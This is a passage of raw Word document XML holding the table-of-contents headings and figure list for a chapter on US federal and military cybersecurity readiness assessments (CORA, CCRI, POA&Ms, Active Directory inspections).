          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.7.7 Discovered Weaknesses in Command and Combatant Operational Policies, Procedures, Guidance, and Standards (PPGS), Documentation, and Administrative-Level Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012662E7" w14:textId="1DE29E2C" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.7.8 Command and Combatant Operational Readiness Findings (Core Network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E7E140" w14:textId="48B3C0E1" w:rsidR="00FC42B2" w:rsidRPr="00E303E6" w:rsidRDefault="00FC42B2" w:rsidP="00E303E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E303E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.8 Risk Analysis, Remediation, and Corrective, Preventive, and Detective Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3323E6" w14:textId="41B01E1B" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.8.1 Assessing Command and Combatant Mission Impacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D8290" w14:textId="1C78CE5B" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.8.2 Risk Determination and Prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC1A344" w14:textId="3454C655" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.8.3 Developing Corrective, Preventive, and Detective Action Plans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D206ED" w14:textId="32330876" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.8.4 What It Means When We Say “Remediation Validation”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D9F3FE" w14:textId="157E25B3" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.8.5 Risk Acceptance Decisions: How They Are Made</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7220A884" w14:textId="649BFE35" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.8.6 Preparing for Re-Certification and Re-Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373E63A9" w14:textId="4D2245B8" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.8.7 Maintaining 24x7x365 Operational Continuous Readiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F06F21" w14:textId="5D856938" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.8.8 Command, Combatant, and Individual Operational Security (OPSEC) and Situational Awareness During Cybersecurity Assessments – Don’t Let Your Guard Down When The Network Is At Its “Most Vulnerable and Susceptible” to Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC490C" w14:textId="7210EF12" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.8.9 Automated POA&amp;M Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DFE030" w14:textId="3D6C6AB0" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.8.10 Mapping Security Vulnerability Findings to the MITRE ATT&amp;CK Framework Tactics, Techniques, and Procedures (TTPs) Matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255891EF" w14:textId="53537EE1" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.8.11 Threat-Informed Remediation Strategies Using Cyber Intelligence Threat Feeds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E32CBF1" w14:textId="67A4EF44" w:rsidR="00FC42B2" w:rsidRPr="00E24DE9" w:rsidRDefault="00FC42B2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.9 The Assessment Process Through the Eyes of an Active Directory Security Engineer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502285F6" w14:textId="582BEFC4" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.9.1 Preparing for a Rigorous, Scrutinizing Domain-Wide Week-Long (Sometimes Longer) Security Inspection from the United States Cyber Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384E595C" w14:textId="3D975ED1" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.9.2 Supporting Your Inspection Teams: Collaboration, Transparency, and Being a Team-Player During a Federal and Military Cybersecurity Evaluation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09228C91" w14:textId="32D7927B" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.9.3 Producing Evidence and Artifacts When Asked To Do So By an Authorized Security Assessor (Red or Blue Team Operator) During a Production Domain or Active Directory Infrastructure Security Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0BBDED" w14:textId="2FFEA108" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.9.4 Explaining Reasoning Behind Identified Findings to CORA Security Inspectors and Leadership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF4D4A3" w14:textId="576E7464" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.9.5 Understanding How to Quantify Identified Risk Through POA&amp;Ms and Risk Acceptances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF4E4B" w14:textId="693B6D96" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.9.6 Supporting Leadership and Risk Decisions – Even If You Agree With Them Or Not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084C1EC3" w14:textId="3C7640F1" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.9.7 Lessons Learned From Assessment Activities – What To Do and Not Do Next Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E1C8F2" w14:textId="7FC86F94" w:rsidR="00FC42B2" w:rsidRPr="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC42B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.10 Case Study: CORA Security Assessment of a Federal and Military Active Directory Enterprise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739BC244" w14:textId="2FBE56B0" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00FC42B2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.10.1 Assessment Preparation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761DA6FB" w14:textId="51B61D63" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00FC42B2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC42B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.10.2 Assessment Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D7BCE6" w14:textId="02E7E063" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00FC42B2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC42B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.10.3 Discovery of Identity-Related Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4F8F12" w14:textId="41F7FACC" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00FC42B2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC42B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.10.4 Risk Analysis and Mission Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF244EC" w14:textId="316D1E99" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00FC42B2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC42B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.10.5 Remediation Activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586ED6C9" w14:textId="2F04A543" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC42B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.10.6 Reassessment and Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A7E2F2" w14:textId="6E1C5E20" w:rsidR="00FC42B2" w:rsidRPr="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC42B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.10.7 Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3754BFED" w14:textId="77777777" w:rsidR="00631074" w:rsidRPr="005D3438" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="495E30A9">
          <v:rect id="_x0000_i1116" style="width:468pt;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953C715" w14:textId="77777777" w:rsidR="00631074" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INCLUDED FIGURES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA01B52" w14:textId="40310806" w:rsidR="00F46DD2" w:rsidRDefault="00F46DD2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Figure 5-1. Relationship Between RMF, Continuous Monitoring, CORAS, CCRIs, and Cybersecurity Assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09726AD2" w14:textId="506CB061" w:rsidR="00F46DD2" w:rsidRDefault="00F46DD2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Figure 5-2. Federal and Military Cybersecurity Assessment Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37402058" w14:textId="58E7F262" w:rsidR="00F46DD2" w:rsidRDefault="00F46DD2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Figure 5-3. Evolution from CCRI to CORA Assessment Methodologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28071C03" w14:textId="45E33A43" w:rsidR="00F46DD2" w:rsidRDefault="00F46DD2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5-4. CORA Command and Combatant Operational Readiness Evaluation Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A03265A" w14:textId="4F5AEF76" w:rsidR="00F46DD2" w:rsidRDefault="00F46DD2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Figure 5-5. Command and Combatant Misson Assurance and Cybersecurity Readiness Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F565FC8" w14:textId="7B6625A5" w:rsidR="00F46DD2" w:rsidRDefault="00F46DD2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
